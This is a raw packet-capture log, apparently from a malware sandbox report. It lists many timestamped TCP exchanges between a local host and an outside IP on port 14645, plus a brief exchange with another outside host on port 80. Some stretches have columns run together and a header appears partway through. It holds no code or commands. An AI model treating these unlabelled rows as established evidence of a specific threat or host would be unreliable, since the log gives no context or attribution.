Nov 18, 2024 16:53:24.133145094 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.133553028 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.133565903 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.133577108 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.133589029 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.133619070 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.134444952 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.134458065 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.134470940 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.134495020 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.178292036 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.180638075 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180682898 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180695057 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180732965 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.180820942 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180833101 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180864096 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.180912971 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180922985 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.180947065 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.181092978 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.181107998 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.181121111 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.181128025 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.181163073 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.181581974 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.181709051 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.181744099 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.186227083 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252710104 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252737045 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252748966 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252787113 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.252856970 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252866983 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252878904 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.252897978 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.252928972 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.253097057 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253108978 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253144979 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.253631115 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253683090 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253694057 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253721952 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.253829002 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253842115 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.253865004 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.254221916 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.254265070 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.254271984 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.254283905 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.254319906 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.254352093 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.301445961 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.301476002 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.301489115 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.301496029 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.301549911 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.301569939 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.301583052 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.301623106 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.302026033 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.302037954 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.302052021 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.302073002 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.302124977 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.302135944 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.302160025 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.302753925 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.302793980 CET  55652  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.302820921 CET  14645  55652  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.303288937 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.372960091 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.372987032 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.372998953 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.373045921 CET  55650  14645  192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.373151064 CET  14645  55650  192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.373163939 CET  14645  55650  192.227.228.36  192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373174906 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373189926 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373222113 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373425961 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373473883 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373507023 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.373534918 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374013901 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374036074 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374047995 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374053001 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374083042 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374171019 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374182940 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374219894 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374530077 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374541044 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374553919 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374576092 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374819040 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374830008 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.374857903 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421905994 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421947956 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421957970 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.421966076 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422013998 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422084093 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422096014 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422106981 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422146082 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422595024 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422632933 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422658920 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422668934 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422700882 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.422710896 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423219919 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423254967 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423285961 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423295975 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423333883 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.423367977 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.468061924 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.468080044 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.468130112 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.499872923 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.499941111 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.499954939 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500024080 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500086069 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500118017 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500124931 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500176907 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500344992 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500483036 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500530005 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500638962 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500701904 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500715971 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500742912 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500822067 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500833035 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500845909 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500859976 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.500884056 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501416922 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501466036 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501477957 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.501502991 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.534926891 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.534993887 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.535007000 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.535021067 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.535114050 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542582035 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542726994 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542746067 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542781115 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542790890 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542794943 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.542834997 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543006897 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543050051 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543097019 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543109894 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543148041 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543160915 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543670893 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543708086 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543709040 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543721914 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543766975 CET5565214645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543836117 CET1464555652192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.543848991 CET1464555652192.227.228.36192.168.2.8
Timestamp                            Src Port  Dst Port  Source IP       Dest IP
Nov 18, 2024 16:53:24.543884993 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.588509083 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.588565111 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.588634014 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.621124983 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.621164083 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.621177912 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.621254921 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.621325016 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.621337891 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.621367931 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622004032 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622028112 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622040033 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622045994 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622076035 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622143030 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622214079 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622226000 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622255087 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622502089 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622540951 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622586012 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622596979 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622631073 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622786045 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622855902 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622890949 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.622961044 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.622971058 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.623008966 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.655556917 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.655599117 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.655612946 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.655672073 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.655684948 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.655694962 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.655719995 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.662980080 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663009882 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663017035 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663069010 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663109064 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.663151026 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.663153887 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663213015 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663228035 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663255930 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.663309097 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663388014 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.663724899 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663791895 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663805008 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.663856983 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.664136887 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.664176941 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.664458036 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.664545059 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.664557934 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.664601088 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.709477901 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.709546089 CET  14645     55652     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.709579945 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.709580898 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.741512060 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.741574049 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.741588116 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.741641998 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.741698980 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.741712093 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.741775036 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.742250919 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742319107 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742327929 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.742330074 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742425919 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.742468119 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742480993 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742542982 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.742856979 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742878914 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.742938042 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.743135929 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.743192911 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.743202925 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.743237972 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.776007891 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776026964 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776040077 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776053905 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776094913 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776108980 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.776134014 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776134968 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.776148081 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.776179075 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.776196003 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.803318977 CET  55652     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.862118959 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.862157106 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.862251997 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.862665892 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863080978 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863095999 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863162041 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.863166094 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863179922 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863193989 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863207102 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.863209963 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.863229990 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.863996029 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.864011049 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.864025116 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.864047050 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.864067078 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.864078999 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.864080906 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.864128113 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.896339893 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.896375895 CET  14645     55650     192.227.228.36  192.168.2.8
Nov 18, 2024 16:53:24.896428108 CET  55650     14645     192.168.2.8     192.227.228.36
Nov 18, 2024 16:53:24.896831036 CET  14645     55650     192.227.228.36  192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896856070 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896876097 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.896899939 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.897064924 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.897078991 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.897104979 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.942756891 CET8055651178.237.33.50192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.942817926 CET5565180192.168.2.8178.237.33.50
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.957469940 CET5565014645192.168.2.8192.227.228.36
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982676029 CET1464555650192.227.228.36192.168.2.8
                                                                                                                                                                                                                                Nov 18, 2024 16:53:24.982691050 CET1464555650192.227.228.36192.168.2.8
